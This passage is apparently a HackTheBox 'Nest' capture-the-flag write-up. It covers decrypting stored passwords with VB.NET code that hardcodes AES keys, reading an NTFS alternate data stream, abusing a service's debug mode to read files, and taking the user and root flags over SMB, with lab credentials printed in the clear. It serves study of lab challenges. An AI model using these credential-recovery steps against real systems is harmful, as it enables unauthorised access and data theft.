        Dim test As New SsoIntegration With {.Username = Config.Username, .Password = Utils.DecryptString(Config.Password)}

    End Sub

End Module

root in WIP/RU/RUScanner 
❯

And the Utils.vb are responsible for decrypting the password :

# bash

root in WIP/RU/RUScanner 
❯ cat Utils.vb
Imports System.Text
Imports System.Security.Cryptography
Public Class Utils

    Public Shared Function GetLogFilePath() As String
        Return IO.Path.Combine(Environment.CurrentDirectory, "Log.txt")
    End Function

    Public Shared Function DecryptString(EncryptedString As String) As String
        If String.IsNullOrEmpty(EncryptedString) Then
            Return String.Empty
        Else
            Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function EncryptString(PlainString As String) As String
        If String.IsNullOrEmpty(PlainString) Then
            Return String.Empty
        Else
            Return Encrypt(PlainString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
        End If
    End Function

    Public Shared Function Encrypt(ByVal plainText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                    ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte() = Encoding.ASCII.GetBytes(initVector)
        Dim saltValueBytes As Byte() = Encoding.ASCII.GetBytes(saltValue)
        Dim plainTextBytes As Byte() = Encoding.ASCII.GetBytes(plainText)
        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                           saltValueBytes, _
                                           passwordIterations)
        Dim keyBytes As Byte() = password.GetBytes(CInt(keySize / 8))
        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC
        Dim encryptor As ICryptoTransform = symmetricKey.CreateEncryptor(keyBytes, initVectorBytes)
        Using memoryStream As New IO.MemoryStream()
            Using cryptoStream As New CryptoStream(memoryStream, _
                                            encryptor, _
                                            CryptoStreamMode.Write)
                cryptoStream.Write(plainTextBytes, 0, plainTextBytes.Length)
                cryptoStream.FlushFinalBlock()
                Dim cipherTextBytes As Byte() = memoryStream.ToArray()
                memoryStream.Close()
                cryptoStream.Close()
                Return Convert.ToBase64String(cipherTextBytes)
            End Using
        End Using
    End Function

    Public Shared Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                    ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                           saltValueBytes, _
                                           passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                            0, _
                                            decryptedByteCount)

        Return plainText
    End Function

End Class

root in WIP/RU/RUScanner 
❯

Decrypting the Password

We can cut and patch some of this code together to make a single file we can run on dotnetfiddle
I put the hash I got early on the line run the line Return Decrypt script. the decryption is happen here :

Decrypt(β€œHASH”, β€œN3st22”, β€œ88552299”, 2, β€œ464R5DFA5DL6LE28”, 256) so :

from :

# bash

Public Shared Function DecryptString(EncryptedString As String) As String
    If String.IsNullOrEmpty(EncryptedString) Then
        Return String.Empty
    Else
    	# replace hash here 
        Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
    End If
End Function

to :

# bash

Public Shared Function DecryptString(EncryptedString As String) As String
    If String.IsNullOrEmpty(EncryptedString) Then
        Return String.Empty
    Else
    	# replace hash here 
        Return Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
    End If
End Function

Execute this and we will get the password xRxRxPANCAK3SxRxRx this is the final results :

HackTheBox-Nest

Exploitation

Enumerate C.Smith

So now that I successfully decrypt the password. How about try to login it again in smbclient :

# bash

root in htb/boxes/Nest 
❯ smbclient  \\\\10.10.10.178\\Users -U C.Smith
Enter WORKGROUP\C.Smith's password: 
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
  .                                   D        0  Sun Jan 26 07:04:21 2020
  ..                                  D        0  Sun Jan 26 07:04:21 2020
  Administrator                       D        0  Fri Aug  9 23:08:23 2019
  C.Smith                             D        0  Sun Jan 26 15:21:44 2020
  L.Frost                             D        0  Fri Aug  9 01:03:01 2019
  R.Thompson                          D        0  Fri Aug  9 01:02:50 2019
  TempUser                            D        0  Thu Aug  8 06:55:56 2019

\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*

\C.Smith
  .                                   D        0  Sun Jan 26 15:21:44 2020
  ..                                  D        0  Sun Jan 26 15:21:44 2020
  HQK Reporting                       D        0  Fri Aug  9 07:06:17 2019
  user.txt                            A       32  Fri Aug  9 07:05:24 2019

\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*

\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*

\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*

\C.Smith\HQK Reporting
  .                                   D        0  Fri Aug  9 07:06:17 2019
  ..                                  D        0  Fri Aug  9 07:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 20:18:42 2019
  Debug Mode Password.txt             A        0  Fri Aug  9 07:08:17 2019
  HQK_Config_Backup.xml               A      249  Fri Aug  9 07:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
  .                                   D        0  Fri Aug  9 20:18:42 2019
  ..                                  D        0  Fri Aug  9 20:18:42 2019
  HqkLdap.exe                         A    17408  Thu Aug  8 07:41:16 2019

so looks like i can now get the user.txt as you can see on this line :

# bash

smb: \> cd C.Smith
smb: \C.Smith\> ls
  .                                   D        0  Sun Jan 26 15:21:44 2020
  ..                                  D        0  Sun Jan 26 15:21:44 2020
  HQK Reporting                       D        0  Fri Aug  9 07:06:17 2019
  user.txt                            A       32  Fri Aug  9 07:05:24 2019

\C.Smith\HQK Reporting
  .                                   D        0  Fri Aug  9 07:06:17 2019
  ..                                  D        0  Fri Aug  9 07:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 20:18:42 2019
  Debug Mode Password.txt             A        0  Fri Aug  9 07:08:17 2019
  HQK_Config_Backup.xml               A      249  Fri Aug  9 07:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
  .                                   D        0  Fri Aug  9 20:18:42 2019
  ..                                  D        0  Fri Aug  9 20:18:42 2019
  HqkLdap.exe                         A    17408  Thu Aug  8 07:41:16 2019

                10485247 blocks of size 4096. 6544137 blocks available
smb: \C.Smith\>

Grab the user flag

Finally I have now the user.txt i downloaded it using smbclient :

# bash

smb: \C.Smith\> mget user.txt
Get file user.txt? y
getting file \C.Smith\user.txt of size 32 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \C.Smith\>

root in htb/boxes/Nest 
❯ cut -c 4-12 user.txt
b25404be

Privilege Escalation

So going to the firs enumeration of C.Smith there’s a interesting .txt file and executable HqkLdap.exe as you see on this line :

# bash

\C.Smith\HQK Reporting
  .                                   D        0  Thu Aug  8 19:06:17 2019
  ..                                  D        0  Thu Aug  8 19:06:17 2019
  AD Integration Module               D        0  Fri Aug  9 08:18:42 2019
  Debug Mode Password.txt             A        0  Thu Aug  8 19:08:17 2019
  HQK_Config_Backup.xml               A      249  Thu Aug  8 19:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
  .                                   D        0  Fri Aug  9 08:18:42 2019
  ..                                  D        0  Fri Aug  9 08:18:42 2019
  HqkLdap.exe                         A    17408  Wed Aug  7 19:41:16 2019

I initially came across the Debug Mode Password.txt file and thought this could be used to authenticate to the DEBUG mode of the HQK Reporting Service v1.2 service running on port 4386 we see this on our nmap scan. The file appeared to have 0 bytes. I spent some time searching around further and couldn’t find any other files of interest. After wasting some time on futile approaches, I eventually realized that the file could potentially have had alternate streams on an NTFS file system. I enumerated the streams and retrieved the Password stream of the file :

# bash

smb: \C.Smith\HQK Reporting\> more DEBUGM~1.TXT:Password:$DATA
getting file \C.Smith\HQK Reporting\DEBUGM~1.TXT:Password:$DATA of size 15 as /tmp/smbmore.mFLHg4 (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

WBQ201953D8w
/tmp/smbmore.mFLHg4

smb: \C.Smith\>

if I run allinfo on it, I can see something else:

# bash

smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time:    Thu Aug  8 07:06:12 PM 2019 EDT
access_time:    Thu Aug  8 07:06:12 PM 2019 EDT
write_time:     Thu Aug  8 07:08:17 PM 2019 EDT
change_time:    Thu Aug  8 07:08:17 PM 2019 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes

❯ cat Debug\ Mode\ Password.txt:Password
WBQ201953D8w

So this really interesting it shows password debug : WBQ201953D8w this will be something useful later :

Enumeration with telnet

I’ll connect again to HQK with telnet in port 4386 and start digging. We can then use the password debug to gain the ability to run the SHOWQUERY command on the HQK Reporting Service. This functionality can be used to read files. After spending some time searching around I came across the Ldap.conf file that is located in ../LDAP/.

# bash

root in htb/boxes/Nest 
❯ telnet 10.10.10.178 4386
Trying 10.10.10.178...                                                                                                                                                                     
Connected to 10.10.10.178.                                                                                                                                                                 
Escape character is '^]'.                                                                                                                                                                  
                                                                                                                                                                                           
HQK Reporting Service V1.2                                                                                                                                                                 
                                                                                                                                                                                           
>help                                                                                                                                                                                      
                                                                                                                                                                                           
This service allows users to run queries against databases using the legacy HQK format                                                                                                     
                                                                                                                                                                                                                
--- AVAILABLE COMMANDS ---                                                                                                                                                                                      

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>

>DEBUG WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available
>


Debug mode enabled. Use the HELP command to view additional commands that are now available
>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>

>

I set the dir to HQK

# bash

>setdir ..

Current directory set to HQK
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[DIR]  ALL QUERIES
[DIR]  LDAP
[DIR]  Logs
[1]   HqkSvc.exe
[2]   HqkSvc.InstallState
[3]   HQK_Config.xml

Current Directory: HQK
>


Current Directory: HQK
>setdir LDAP

Current directory set to LDAP
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP
>

I try to show the Ldap.conf and it give us administrator credentials but the password looks like encrypted again .

# bash

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

 QUERY FILES IN CURRENT DIRECTORY

[1]   HqkLdap.exe
[2]   Ldap.conf

Current Directory: LDAP
>showquery 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

>

Analyzing the HqkLdap.exe

I downloaded the HqkLdap.exe and analyze it using JetBrains - dotPeek it is a free NET Decompiler and Assembly

# bash

smb: \C.Smith\HQK Reporting\AD Integration Module\> mget HqkLdap.exe
Get file HqkLdap.exe? y
getting file \C.Smith\HQK Reporting\AD Integration Module\HqkLdap.exe of size 17408 as HqkLdap.exe (7.5 KiloBytes/sec) (average 7.5 KiloBytes/sec)
smb: \C.Smith\HQK Reporting\AD Integration Module\>

Looking at CR Module binary :

HackTheBox-Nest

This contains the Arguments that we have to pass in the same script from which we Decrypted the user hash because the hash that we found in LDAP.conf is encrypted using another method which we got in CR module(part) and the arguments that we will pass in the decrypt function and compile it.

Debugging the HqkLdap.exe

Did you rember the vb script that will decrypt the encryped password ? I use it again to decrypt also the admin password hash . I replace only this line :

from

Decrypt(β€œHASH”, β€œN3st22”, β€œ88552299”, 2, β€œ464R5DFA5DL6LE28”, 256)
"fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256

to :

Decrypt(β€œHASH”, β€œ667912”, β€œ1313Rf99”, 3, β€œ1L1SA61493DRV53Z”, 256)
"yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=", "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256

This is the final script

# vb.net

Imports System.Text
Imports System
Imports System.Security.Cryptography
				
Public Module Module1
		Public Sub Main()
		Console.WriteLine(Decrypt("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=", "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256))
		End Sub
	 Public Function Decrypt(ByVal cipherText As String, _
                                   ByVal passPhrase As String, _
                                   ByVal saltValue As String, _
                                    ByVal passwordIterations As Integer, _
                                   ByVal initVector As String, _
                                   ByVal keySize As Integer) _
                           As String

        Dim initVectorBytes As Byte()
        initVectorBytes = Encoding.ASCII.GetBytes(initVector)

        Dim saltValueBytes As Byte()
        saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

        Dim cipherTextBytes As Byte()
        cipherTextBytes = Convert.FromBase64String(cipherText)

        Dim password As New Rfc2898DeriveBytes(passPhrase, _
                                           saltValueBytes, _
                                           passwordIterations)

        Dim keyBytes As Byte()
        keyBytes = password.GetBytes(CInt(keySize / 8))

        Dim symmetricKey As New AesCryptoServiceProvider
        symmetricKey.Mode = CipherMode.CBC

        Dim decryptor As ICryptoTransform
        decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

        Dim memoryStream As IO.MemoryStream
        memoryStream = New IO.MemoryStream(cipherTextBytes)

        Dim cryptoStream As CryptoStream
        cryptoStream = New CryptoStream(memoryStream, _
                                        decryptor, _
                                        CryptoStreamMode.Read)

        Dim plainTextBytes As Byte()
        ReDim plainTextBytes(cipherTextBytes.Length)

        Dim decryptedByteCount As Integer
        decryptedByteCount = cryptoStream.Read(plainTextBytes, _
                                               0, _
                                               plainTextBytes.Length)

        memoryStream.Close()
        cryptoStream.Close()

        Dim plainText As String
        plainText = Encoding.ASCII.GetString(plainTextBytes, _
                                            0, _
                                            decryptedByteCount)

        Return plainText
    End Function
End Module


Copy and execute this in dotnetfiddle and we will get the password :

HackTheBox-Nest

Administrator password : XtH4nkS4Pl4y1nGX

Grabbing the root.txt

Sadly we can’t use this in Evil-WinRM we don’t have proper shell to get the root.txt just only smbclient

# bash

root in htb/boxes/Nest 
❯ smbclient  \\\\10.10.10.178\\c$ -U Administrator
Enter WORKGROUP\Administrator's password: 
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> ls
  .                                  DR        0  Sun Jan 26 15:20:50 2020
  ..                                 DR        0  Sun Jan 26 15:20:50 2020
  desktop.ini                       AHS      282  Sun Jan 26 06:02:44 2020
  root.txt                            A       32  Tue Aug  6 06:27:26 2019

                10485247 blocks of size 4096. 6545433 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 32 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Users\Administrator\Desktop\>

download the root.txt and finally !

# bash

root in htb/boxes/Nest 
❯ ls
'Debug Mode Password.txt'   HqkLdap.exe   IT  'Maintenance Alerts.txt'   nmap-Nest   Production   Reports   root.txt   Shared   user.txt  'Welcome Email.txt'

root in htb/boxes/Nest 
❯ cut -c 4-12 root.txt
c2eb084bc
root in htb/boxes/Nest 
❯

If you liked my writeup please leave a respect on my Profile

Payas0

Referrences:

dotPeek - .NET Decompiler and Assembly

dotnetfiddle